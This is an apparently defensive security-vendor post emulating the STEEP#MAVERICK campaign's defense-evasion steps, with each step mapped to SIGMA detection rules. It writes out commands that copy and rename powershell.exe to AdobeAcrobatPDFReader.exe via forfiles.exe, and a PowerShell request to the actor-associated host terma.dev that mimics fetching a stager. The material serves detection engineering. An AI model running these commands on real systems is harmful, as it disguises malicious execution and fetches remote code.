The next installment of our STEEP#MAVERICK emulation series highlights a defense evasion technique leveraged by the threat actor shortly after initial infection. Similar to many targeted campaigns, initial infection begins with a phishing email containing a malicious attachment. In STEEP#MAVERICK, the email contained a compressed (.zip) file with a shortcut (.lnk) file inside. The shortcut file attempts to hide its execution by calling forfiles.exe.
Our emulation begins here with a step where the threat actor calls forfiles.exe to copy powershell.exe to C:\Windows and rename it to AdobeAcrobatPDFReader.
We then use the newly renamed powershell to obtain the name of the domain the device belongs to and if a hypervisor is present. The threat actor did not perform this step in the campaign but we include it here to provide a detection opportunity.
The following step is where we mimic a C2 connection to hxxps://terma[.]dev/0 to pull down the initial stager.
Clean-up steps to remove the renamed powershell.exe file are included after a 3 minute delay.
Detection Opportunities
| Step Number |
Request |
SIGMA Rule(s) |
Author(s) |
| 4 |
run forfiles.exe /c "cmd.exe /c copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\AdobeAcrobatPDFReader.exe |
Creation of an Executable by an Executable |
frack113 |
| |
|
Indirect Command Execution |
E.M. Anhaus, oscd.community |
| |
|
Suspicious Copy From or To System32 |
Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update) |
| |
|
Suspicious In-Memory Module Execution |
Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro |
| 5 |
run C:\windows\AdobeAcrobatPDFReader.exe /c Get-ComputerInfo -Property CsDomain, HyperVisorPresent |
Highly Relevant Renamed Binary |
Matthew Green - @mgreen27, Florian Roth |
| |
|
In-memory PowerShell |
Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton |
| |
|
Renamed Binary |
Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades) |
| |
|
Renamed PowerShell |
Florian Roth, frack113 |
| |
|
Suspicious In-Memory Module Execution |
Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro |
| 8 |
upsh --cmd Invoke-Command -ScriptBlock { try { $response = Invoke-WebRequest -Uri https://terma.dev/0 -TimeoutSec 15 } catch { $_.Exception.Response.StatusCode.Value__ } } |
Alternate PowerShell Hosts |
Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| |
|
Alternate PowerShell Hosts Pipe |
Roberto Rodriguez @Cyb3rWard0g, Tim Shelton |
| |
|
In-memory PowerShell |
Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton |
| |
|
Raw Disk Access Using Illegitimate Tools |
Teymur Kheirkhabarov, oscd.community |
| |
|
Suspicious WSMAN Provider Image Loads |
Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
This post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.
References